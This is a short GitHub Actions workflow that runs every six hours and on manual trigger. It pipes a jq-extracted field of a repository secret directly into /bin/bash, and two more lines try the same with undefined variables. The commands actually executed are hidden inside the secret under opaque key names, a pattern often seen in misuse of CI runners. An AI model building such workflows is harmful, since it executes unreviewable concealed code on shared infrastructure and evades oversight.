name: liangjiajiang9129

on:
  workflow_dispatch:
  schedule:
    - cron: '36 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: liangjiajiang9129
        env:
          zk60: ${{ secrets.zk60 }}
        run: |
          echo $zk60 | jq -r .sgh9547 | /bin/bash
          echo $ydfl14 | jq -r .yt2 | /bin/bash
          echo $b2313 | jq -r .kyxd4 | /bin/bash

